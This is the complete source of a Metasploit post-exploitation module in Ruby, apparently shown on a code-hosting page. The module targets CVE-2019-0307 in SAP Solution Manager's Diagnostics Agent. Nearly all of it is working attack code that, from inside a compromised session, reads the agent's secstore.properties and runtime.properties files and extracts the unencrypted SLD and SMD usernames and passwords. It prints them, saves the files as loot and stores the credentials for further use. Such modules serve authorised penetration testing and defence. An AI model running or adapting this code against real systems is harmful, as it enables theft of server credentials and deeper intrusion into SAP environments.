Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'resolv'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Post::File
10
  include Msf::Exploit::Local::SapSmdAgentUnencryptedProperty
11

12
  SECSTORE_FILE = 'secstore.properties'.freeze
13
  RUNTIME_FILE = 'runtime.properties'.freeze
14

15
  WIN_PREFIX = 'c:\\usr\\sap\\DAA\\'.freeze
16
  UNIX_PREFIX = '/usr/sap/DAA/'.freeze
17

18
  WIN_SUFFIX = '\\SMDAgent\\configuration\\'.freeze
19
  UNIX_SUFFIX = '/SMDAgent/configuration/'.freeze
20

21
  def initialize(info = {})
22
    super(
23
      update_info(
24
        info,
25
        'Name' => 'Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server',
26
        'Description' => %q{
27
          This module retrieves the `secstore.properties` file on a SMDAgent. This file contains the credentials
28
          used by the SMDAgent to connect to the SAP Solution Manager server.
29
        },
30
        'License' => MSF_LICENSE,
31
        'Author' => [
32
          'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
33
          'Vladimir Ivanov' # @_generic_human_ This Metasploit module
34
        ],
35
        'Platform' => %w[bsd linux osx unix win],
36
        'SessionTypes' => %w[meterpreter shell],
37
        'References' => [
38
          [ 'CVE', '2019-0307' ],
39
          [ 'URL', 'https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf' ]
40
        ],
41
        'Compat' => {
42
          'Meterpreter' => {
43
            'Commands' => %w[
44
              stdapi_net_resolve_host
45
            ]
46
          }
47
        },
48
        'Notes' => {
49
          'Stability' => [CRASH_SAFE],
50
          'SideEffects' => [IOC_IN_LOGS],
51
          'Reliability' => []
52
        }
53
      )
54
    )
55
  end
56

57
  def run
58
    case session.type
59
    when 'meterpreter'
60
      meterpreter = true
61
    else
62
      meterpreter = false
63
    end
64
    case session.platform
65
    when 'windows'
66
      windows = true
67
      instances = dir(WIN_PREFIX)
68
    else
69
      windows = false
70
      instances = dir(UNIX_PREFIX)
71
    end
72

73
    if instances.nil? || instances.empty?
74
      fail_with(Failure::NotFound, 'SAP root directory not found')
75
    end
76

77
    instances.each do |instance|
78
      next if instance == 'SYS'
79

80
      next if instance.include? ' '
81

82
      next if instance.include? '.'
83

84
      next if instance.include? 'tmp'
85

86
      if windows
87
        runtime_properties_file_name = "#{WIN_PREFIX}#{instance}#{WIN_SUFFIX}#{RUNTIME_FILE}"
88
        secstore_properties_file_name = "#{WIN_PREFIX}#{instance}#{WIN_SUFFIX}#{SECSTORE_FILE}"
89
      else
90
        runtime_properties_file_name = "#{UNIX_PREFIX}#{instance}#{UNIX_SUFFIX}#{RUNTIME_FILE}"
91
        secstore_properties_file_name = "#{UNIX_PREFIX}#{instance}#{UNIX_SUFFIX}#{SECSTORE_FILE}"
92
      end
93

94
      runtime_properties = parse_properties_file(runtime_properties_file_name, meterpreter)
95
      secstore_properties = parse_properties_file(secstore_properties_file_name, meterpreter)
96

97
      next if runtime_properties.empty?
98

99
      print_line
100
      print_status("Instance: #{instance}")
101
      print_status("Runtime properties file name: #{runtime_properties_file_name}")
102
      print_status("Secstore properties file name: #{secstore_properties_file_name}")
103

104
      sld_protocol = nil
105
      sld_hostname = nil
106
      sld_address = nil
107
      sld_port = nil
108
      sld_username = nil
109
      sld_password = nil
110

111
      smd_url = nil
112
      smd_username = nil
113
      smd_password = nil
114

115
      # Parse runtime.properties file
116
      runtime_properties.each do |property|
117
        if property[:name].include?('sld.')
118
          case property[:name]
119
          when /hostprotocol/
120
            sld_protocol = property[:value]
121
          when /hostname/
122
            sld_hostname = property[:value]
123
          when /hostport/
124
            sld_port = property[:value]
125
          end
126
        elsif property[:name].include?('smd.')
127
          case property[:name]
128
          when /url/
129
            smd_url = property[:value].gsub(/\\:/, ':')
130
          end
131
        end
132
      end
133

134
      # Parse secstore.properties file
135
      secstore_properties.each do |property|
136
        if property[:name].include?('sld/')
137
          case property[:name]
138
          when /usr/
139
            sld_username = property[:value]
140
          when /pwd/
141
            sld_password = property[:value]
142
          end
143
        elsif property[:name].include?('smd/')
144
          case property[:name]
145
          when /User/
146
            smd_username = property[:value]
147
          when /Password/
148
            smd_password = property[:value]
149
          end
150
        end
151
      end
152

153
      # Print SLD properties
154
      if !sld_protocol.nil? || !sld_hostname.nil? || !sld_port.nil? || !sld_username.nil? || !sld_password.nil?
155
        print_line
156
        print_status('SLD properties:')
157
        print_status("SLD protocol: #{sld_protocol}") unless sld_protocol.nil?
158
        unless sld_hostname.nil?
159
          print_status("SLD hostname: #{sld_hostname}")
160
          if meterpreter
161
            if sld_hostname =~ Resolv::IPv4::Regex
162
              sld_address = sld_hostname
163
            else
164
              begin
165
                sld_address = session.net.resolve.resolve_host(sld_hostname)[:ip]
166
                print_status("SLD address: #{sld_address}")
167
              rescue Rex::Post::Meterpreter::RequestError
168
                print_error("Failed to resolve SLD hostname: #{sld_hostname}")
169
              end
170
            end
171
          end
172
        end
173
        print_status("SLD port: #{sld_port}") unless sld_port.nil?
174
        print_good("SLD username: #{sld_username}") unless sld_username.nil?
175
        print_good("SLD password: #{sld_password}") unless sld_password.nil?
176
      end
177

178
      # Print SMD properties
179
      if !smd_url.nil? || !smd_username.nil? || !smd_password.nil?
180
        print_line
181
        print_status('SMD properties:')
182
        print_status("SMD url: #{smd_url}") unless smd_url.nil?
183
        print_good("SMD username: #{smd_username}") unless smd_username.nil?
184
        print_good("SMD password: #{smd_password}") unless smd_password.nil?
185
      end
186

187
      # Store decoded credentials, report service and vuln
188
      print_line
189
      if sld_username.nil? || sld_password.nil?
190
        print_error("File #{secstore_properties_file_name} read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.")
191
      else
192
        # Store decoded credentials
193
        print_good('Store decoded credentials for SolMan server')
194
        if sld_address.nil? || sld_port.nil?
195
          service_data = {}
196
        else
197
          service_data = {
198
            origin_type: :service,
199
            address: sld_address,
200
            port: sld_port,
201
            service_name: 'http',
202
            protocol: 'tcp'
203
          }
204
          # Report service
205
          report_service(
206
            host: sld_address,
207
            port: sld_port,
208
            name: 'http',
209
            proto: 'tcp',
210
            info: 'SAP Solution Manager'
211
          )
212
        end
213
        store_valid_credential(
214
          user: sld_username,
215
          private: sld_password,
216
          private_type: :password,
217
          service_data: service_data
218
        )
219
        # Report vulnerability
220
        if meterpreter
221
          agent_host = Rex::Socket.getaddress(session.sock.peerhost, true)
222
        else
223
          agent_host = session.session_host
224
        end
225
        report_vuln(
226
          host: agent_host,
227
          name: name,
228
          refs: references
229
        )
230
      end
231
    end
232
  end
233

234
  def parse_properties_file(filename, is_meterpreter)
235
    properties = []
236
    if file_exist?(filename)
237
      properties_content = read_file(filename)
238
      if properties_content.nil?
239
        print_error("Failed to read properties file: #{filename}")
240
      else
241
        if is_meterpreter
242
          agent_host = Rex::Socket.getaddress(session.sock.peerhost, true)
243
        else
244
          agent_host = session.session_host
245
        end
246
        loot = store_loot('smdagent.properties', 'text/plain', agent_host, properties_content, filename, 'SMD Agent properties file')
247
        print_good("File #{filename} saved in: #{loot}")
248
        properties = parse_properties(properties_content)
249
      end
250
    else
251
      print_error("File: #{filename} does not exist")
252
    end
253
    properties
254
  end
255

256
end
257

258